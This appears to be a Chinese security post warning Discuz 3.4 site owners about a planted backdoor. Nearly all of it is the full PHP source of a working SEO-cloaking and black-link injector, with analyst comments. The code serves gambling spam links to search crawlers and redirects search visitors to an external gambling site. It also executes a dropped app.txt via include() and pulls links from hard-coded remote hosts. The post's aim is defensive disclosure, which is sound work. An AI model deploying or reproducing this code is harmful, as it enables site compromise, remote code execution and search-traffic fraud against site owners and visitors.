Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
案例黑链注入代码:
可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。
Discuz 3.4漏洞利用报告:网站后门木马文件案例 彩票黑链/友情链接黑链注入脚本:
引入位置:
/static/space/t2/images/下面 *.txt 引用/转换文件
案例黑链注入代码:
<?php
// Analyst annotation of the cloaking / black-link injector quoted in this post.
// The code is the sample as pasted (line breaks restored); the comments describe
// what each part does so that a site owner can recognise the file, its companion
// *.txt payloads and the external hosts it contacts. Hosts referenced in the
// sample: www.wlbxsjs.com, link.wlbxsjs.com, www.sohu999.com, 958999a.com.

// Suppress PHP error output so a broken payload does not show up in the page.
ini_set('html_errors', false);
ini_set('display_errors', false);
define("APP_INCLUDE_FLAG", "TRUE");
define('APP_JACK_CHARSET', 'GBK');
header("Content-type: text/html; charset=".APP_JACK_CHARSET);
// Absolute path of the payload directory - the "/static/space/t2/images/"
// location the post tells site owners to inspect.
define('APP_JACK_DOCUMENTROOT', '/home/wwwroot/discuz/domain/discuz.net/web/static/space/t2/images/');
// Remote text file fetched at runtime; each line is a link to inject (see replaceMyLink()).
define('MY_LINK_URL', 'http://www.wlbxsjs.com/l.txt');
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
// Both branches define identical constants, so the "sogou" check has no effect.
if (stristr($userAgent, "sogou")) {
    define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT.'zi.txt');
    define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT.'moban.txt');
    define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT.'bianliang.txt');
} else {
    define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT.'zi.txt');
    define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT.'moban.txt');
    define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT.'bianliang.txt');
}
// Payload file names to look for in the directory above: zi.txt, moban.txt,
// bianliang.txt, wen.txt, miaoshu.txt, bianliang2.txt, bianliang3.txt,
// hunhe.txt, app.txt.
define('APP_JACK_ARTICLE', APP_JACK_DOCUMENTROOT.'wen.txt');
define('APP_JACK_DES', APP_JACK_DOCUMENTROOT.'miaoshu.txt');
define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT.'bianliang2.txt');
define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT.'bianliang3.txt');
define('APP_MIX_KWD_FILE', APP_JACK_DOCUMENTROOT.'hunhe.txt');
define('APP_JACK_CACHED', 'Uncached');
define('APP_JACK_MIN_PAR', '3');
define('APP_JACK_MAX_PAR', '3');
define('APP_JACK_MIN', '10');
define('APP_JACK_MAX', '15');
// app.txt is executed with include() in missclient::run(), so any PHP it
// contains runs with the web server's privileges - this file is the real backdoor.
define('APP_JACK_APPFILE', APP_JACK_DOCUMENTROOT.'app.txt');

// Fabricates a Discuz-style thread URL with a random id (used for the hidden anchors).
function App_GetLink(){
    return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
// Identical to App_GetLink() in the code shown here.
function App_GetSelf(){
    return 'http://www.discuz.net/thread-'.mt_rand(9999999,9999999999).'-1-1.html';
}
// Return image (original comment, translated): a random image URL on the external host.
function getImg(){
    return 'http://link.wlbxsjs.com/tupian/'.rand(1,7000).".jpg";
}

// Runs on every include of this file. The class is declared further down;
// PHP hoists unconditional class declarations, so this works.
$my_app = new missclient();
$my_app->run();

class missclient{
    public $show_spider;
    public $jump_ref;        // referrer fragments treated as "came from a search engine"
    public $http_ref_filter; // referrer fragments (search operators) that switch the behaviour off
    public $jump_url = "";
    public $domain = "";
    public $condition = "";
    public $app_server = "";
    public $log_spider = ""; // empty here, so isSpider() writes no log
    public $cur_spider = "";
    public $allow_ip = "";   // despite the name, isAllowdIp() returns false for these fragments
    public $isCache = false;

    // Entry point. Three outcomes: serve generated content to a search crawler,
    // redirect a human visitor who arrived from a search engine, or do nothing.
    public function run(){
        $this->domain = $this->getServerName();
        $this->jump_ref = explode("|", "360.|haoso.|bing.|google.|sogou.|soso.|so.com|.sm.cn|.youdao|.yisou|.easou|.etao|.chinaso");
        $this->http_ref_filter = explode("|", "inurl:|site:|site%3A|inurl%3A");
        // Client IPs containing these substrings are excluded (see isAllowdIp()).
        $this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
        // Acts only on thread ids above 9999999, i.e. the fabricated URLs from
        // App_GetLink(), not on real forum threads.
        $this->condition = ($_GET['tid'] > 9999999 && $this->isAllowdIp());
        $this->app_server = "http://www.sohu999.com/gbk/app.php";
        // Cache path below is switched off in this sample, so it is dead code here.
        $this->isCache = False;
        if($this->isSpider() && $this->isAllowdIp()){
            if($this->condition){
                if($this->isCache){
                    $relset_host = $this->getServerName();
                    // Per-host cache directory under the system temp dir; chr(47) is '/'.
                    $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
                    $cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
                    if(!@file_exists($dir)){
                        mkdir($dir, 0777);
                    }
                    if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
                        // coreAppCache methods are not static; calling them as
                        // coreAppCache::read() is deprecated on PHP 7 and an Error on PHP 8.
                        $var = coreAppCache::read($cacheFile);
                        $page = file_get_contents(APP_JACK_TEMPLATE);
                        foreach($var as $key=>$v){
                            $flag = "{".$key."}";
                            $page = str_replace($flag,$v,$page);
                        }
                        echo myReplace($page);
                        exit();
                    } else {
                        // Just include the APP (original comment, translated).
                        $currentPage = include(APP_JACK_APPFILE);
                        if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){
                            $var = self::cut($currentPage,"<explode>","</explode>");
                            $var = coreAppCache::decode($var);
                            $page = file_get_contents(APP_JACK_TEMPLATE);
                            foreach($var as $key=>$v){
                                $flag = "{".$key."}";
                                $page = str_replace($flag,$v,$page);
                            }
                            echo myReplace($page);
                            @coreAppCache::writenocode($currentPage,$cacheFile);
                        }
                    }
                    die();
                } else {
                    // Live path for crawlers: execute app.txt and print its return
                    // value after template substitution by myReplace().
                    $currentPage = include(APP_JACK_APPFILE);
                    echo myReplace($currentPage);
                    die();
                }
            } else {
                // Crawler on an ordinary page: emit the hidden anchors ("black links").
                $this->_uncondition_hook();
            }
        } else {
            // Human visitor coming from a search engine is redirected by Jump().
            if($this->isRef() && $this->condition){
                $this->Jump();
            } else {
                $this->_unSpider_hook();
            }
        }
    }

    // Returns false when the client IP contains any allow_ip fragment (substring
    // match, not a prefix check), true otherwise - an exclusion list, not an allow list.
    public function isAllowdIp(){
        $ip = $this->clientIp();
        $non_list = explode("|",$this->allow_ip);
        foreach($non_list as $iplist){
            if(@stristr($ip,$iplist)){
                return false;
            }
        }
        return true;
    }

    // Client IP. HTTP_CLIENT_IP and X-Forwarded-For are consulted before
    // REMOTE_ADDR; both are request headers, so the value is not reliable.
    // $onlineip is undefined if none of the four sources is set.
    public function clientIp(){
        if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
            $onlineip = getenv('HTTP_CLIENT_IP');
        } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
            $onlineip = getenv('HTTP_X_FORWARDED_FOR');
        } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
            $onlineip = getenv('REMOTE_ADDR');
        } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
            $onlineip = $_SERVER['REMOTE_ADDR'];
        }
        // First run of 7-15 digits/dots; 'unknown' when nothing matches.
        preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
        $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
        unset($onlineipmatches);
        return $onlineip;
    }

    // True when the User-Agent contains a known crawler string; records the
    // matching key in cur_spider. The repeated 'Sogou' key means only the last
    // Sogou value ('Sogou web spider') survives in the array literal.
    public function isSpider(){
        $bots = array( 'Google' => 'Googlebot', 'MSN' => 'MSNbot', 'Soso' => 'Sosospider', 'Youdao' => 'Youdaobot', 'Yodao' => 'Yodaobot', 'Yisou' => 'Yisouspider', 'Easou' => 'Easouspider', 'Etao' => 'Etaospider', 'Chinaso' => 'Chinasospider', 'Baidu' => 'Baiduspider', 'Sogou' => 'Sogou news Spider', 'Sogou' => 'Sogou orion spider', 'Sogou' => 'Sogou news Spider', 'Sogou' => 'Sogou blog', 'Sogou' => 'Sogou spider2', 'Sogou' => 'Sogou inst spider', 'Sogou' => 'Sogou web spider', 'Haoso' => 'haosouspider', '360spider' => '360spider', 'bingbot' => 'bingbot' );
        $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
        foreach ($bots as $k => $v){
            if (stristr($userAgent,$v)){
                if(!empty($this->log_spider)){
                    // Optional crawler hit log; log_spider is "" in this sample.
                    @file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND);
                }
                $this->cur_spider = $k;
                return true;
                break; // unreachable after return
            }
        }
        return false;
    }

    // Decides whether a non-crawler visitor came from a search engine. Sets a
    // 3-day "domain-filter-bypass" cookie, which disables the redirect on later
    // visits, when the IP is excluded or the referrer contains a search operator
    // (inurl:, site:). Falls through with an implicit null when nothing matches.
    public function isRef(){
        $ref = strtolower(@$_SERVER['HTTP_REFERER']);
        if(isset($_COOKIE["domain-filter-bypass"])){
            return false;
        }
        if(!$this->isAllowdIp()){
            setcookie("domain-filter-bypass", "lol", time() + 259200);
            return false;
        }
        foreach($this->http_ref_filter as $r){
            $r = trim($r);
            if(stristr($ref,$r)){
                setcookie("domain-filter-bypass", "lol", time() + 259200);
                return false;
            }
        }
        foreach($this->jump_ref as $r){
            $r = trim($r);
            if(stristr($ref,$r)){
                return true;
            }
        }
    }

    // Host name from SERVER_NAME, falling back to HTTP_HOST. The strpos() test
    // is truthy-only, so a leading 'http://' (position 0) is never stripped.
    public function getServerName() {
        $ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']);
        if( strpos($ServerName,'http://') ) {
            return str_replace('http://','',$ServerName);
        }
        return $ServerName;
    }

    // Fetches generated content from app_server, passing the host name, the
    // detected crawler and the request's query string. Not called from the code
    // shown here (presumably from app.txt). $cache is undefined when isCache is false.
    public function getPage(){
        if($this->isCache){
            $cache="cached";
        }
        $url = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET);
        return $this->HttpVisit($url);
    }

    // HTTP GET of $weburl via curl, else file_get_contents with a stream context,
    // else a hand-built request over fsockopen. Failures are @-suppressed and
    // yield NULL or partial data.
    public function HttpVisit($weburl) {
        $remote_data = NULL;
        if (function_exists('curl_exec')) {
            $curl = @curl_init();
            @curl_setopt($curl, CURLOPT_URL, $weburl);
            @curl_setopt($curl, CURLOPT_HEADER, 0);
            @curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
            @curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            $remote_data = @curl_exec($curl);
            @curl_close($curl);
        } else {
            if (function_exists('stream_context_create')) {
                $header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
                $http_header = @stream_context_create($header_array);
                $remote_data = @file_get_contents($weburl, false, $http_header);
            } else {
                $temp_url = explode("/", $weburl);
                $new_url = $temp_url[2];
                $http_port = 80;
                $get_file = substr($weburl, strlen($new_url) + 7);
                if (strstr($new_url, chr(58))) { // chr(58) is ':' - host:port form
                    $s_var_array['td'] = explode(chr(58), $new_url);
                    $new_url = $s_var_array['td'][0];
                    $http_port = $s_var_array['td'][1];
                }
                $fsock_result = @fsockopen($new_url, $http_port);
                @fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");
                while (!feof($fsock_result)) {
                    $remote_data .= fgets($fsock_result, 1024);
                }
                @fclose($fsock_result);
            }
        }
        return $remote_data;
    }

    // Redirects the visitor to the hard-coded external site, tagging the request
    // with the victim host name. All three branches build the same Location, so
    // the sogou./bing. referrer checks change nothing.
    public function Jump(){
        $ref = strtolower(@$_SERVER['HTTP_REFERER']);
        if($this->isAllowdIp() && stristr($ref,"sogou.")){
            $domain = str_replace(".","_",$this->domain);
            header('Location: https://958999a.com/?jpb_'.$domain);
            exit;
        }
        $ref = strtolower(@$_SERVER['HTTP_REFERER']);
        if($this->isAllowdIp() && stristr($ref,"bing.")){
            $domain = str_replace(".","_",$this->domain);
            header('Location: https://958999a.com/?jpb_'.$domain);
            exit;
        }
        if($this->isAllowdIp()){
            $domain = str_replace(".","_",$this->domain);
            header('Location: https://958999a.com/?jpb_'.$domain);
            exit;
        }
    }

    // Prints five empty anchors pointing at fabricated thread URLs - the hidden
    // links a crawler indexes. $array is unused.
    public function _uncondition_hook(){
        $array = array();
        for($a=0;$a<5;$a++){
            echo '<a href="'.App_GetLink().'"></a>'."\n";
        }
    }

    // Intentionally empty: ordinary visitors see no change to the page.
    public function _unSpider_hook(){
        //
    }

    public function strStartWith($needle, $haystack){
        return (substr($haystack, 0, strlen($needle))==$needle);
    }

    // Random lowercase alphanumeric string of $length characters (rand(), not a CSPRNG).
    public function rndStr($length=8){
        $str = null;
        $strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
        $max = strlen($strPol)-1;
        for($i=0;$i<$length;$i++){
            $str.=$strPol[rand(0,$max)];
        }
        return $str;
    }

    // Substring of $file between the first $from and the $end that follows it.
    public function cut($file,$from,$end) {
        $message=explode($from,$file);
        $message=explode($end,$message[1]);
        return $message[0];
    }
}

// Cache helpers for the (disabled) cache path in missclient::run(). None of
// the methods is declared static even though run() calls them statically.
class coreAppCache{
    // Write cache (original comment, translated): serialised + compressed + base64.
    public function write($file,$filename){
        return file_put_contents($filename,self::encode($file));
    }
    public function writenocode($file,$filename){
        return file_put_contents($filename,$file);
    }
    // Reads a cache file and decodes its <explode>...</explode> section.
    public function read($filename){
        $content = file_get_contents($filename);
        if(stristr($content,"</explode>")){
            $content = self::cut($content,"<explode>","</explode>");
        }
        return self::decode($content);
    }
    public function encode($file){
        return base64_encode(gzcompress(serialize($file)));
    }
    // unserialize() of content that app.txt or a world-writable cache file controls.
    public function decode($file){
        return unserialize(gzuncompress(base64_decode($file)));
    }
    public function cut($file,$from,$end) {
        $message=explode($from,$file);
        $message=explode($end,$message[1]);
        return $message[0];
    }
}

// Strips leading/trailing whitespace, control characters and a UTF-8 BOM.
function removeBom($str) {
    $str = preg_replace('/^[\pZ\p{Cc}\x{feff}]+|[\pZ\p{Cc}\x{feff}]+$/ux', '', $str);
    return $str;
}

// Callback for myLinkHandler(): fetches MY_LINK_URL once per request (static
// local), splits it into non-empty lines and returns one at random. $str (the
// regex match) is ignored. If the fetch yields nothing, $myLinks is empty and
// array_rand() errors.
function replaceMyLink($str) {
    static $myLinks;
    if (is_null($myLinks)) {
        $c = new missclient();
        $contents = removeBom($c->HttpVisit(MY_LINK_URL));
        $contents = array_filter(array_map('trim', explode(PHP_EOL, $contents)));
        $myLinks = $contents;
    }
    $linkIndex = array_rand($myLinks, 1);
    $link = $myLinks[$linkIndex];
    return $link;
}

// Replaces every {友情链接N} ("friendly link") placeholder in the template with a remote link.
function myLinkHandler($str) {
    return preg_replace_callback('#\{\s*友情链接\d*\s*\}#si', 'replaceMyLink', $str);
}

// Template post-processing: substitutes link placeholders, then evaluates each
// short-echo tag of the form "<?= name(args)" by calling the named function
// with the comma-split args via call_user_func_array(). Any defined function
// can be named in the template text, so the template files are as sensitive
// as app.txt.
function myReplace($str) {
    $str = myLinkHandler($str);
    preg_match_all('#<\?=\s*([^\)]+)\(([^\)]+)\)\s*\?>#i', $str, $arr, PREG_SET_ORDER);
    foreach ($arr as $item) {
        if (isset($item[1], $item[2]) && function_exists($item[1])) {
            $a = call_user_func_array($item[1], explode(',', $item[2]));
            $str = str_replace_first($item[0], $a, $str);
        }
    }
    return $str;
}

// Replaces the first occurrence of $from. The pattern uses '@' delimiters but
// preg_quote() is told '/', so an '@' inside $from is not escaped.
function str_replace_first($from, $to, $subject) {
    $from = '@'.preg_quote($from, '/').'@si';
    return preg_replace($from, $to, $subject, 1);
}

// Random digit string of $len characters, or of a random length between $len
// and $mLen when $mLen is given. $chars is the digits 0-9 repeated three times.
function randKey($len, $mLen = null) {
    $chars = array( "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9" );
    if ($mLen && $mLen > 0) {
        $minLen = min($len, $mLen);
        $maxLen = max($mLen, $len);
        $lenArr = range($minLen, $maxLen);
        $len = $lenArr[array_rand($lenArr)];
    }
    $charsLen = count($chars) - 1;
    shuffle($chars);
    $str = "";
    for ($i=0; $i<$len; $i++) {
        $str .= $chars[mt_rand(0, $charsLen)];
    }
    return trim($str);
}
?>
可被引入挂载黑链,请站长引起重视,检查目标位置是否存在莫名txt文件。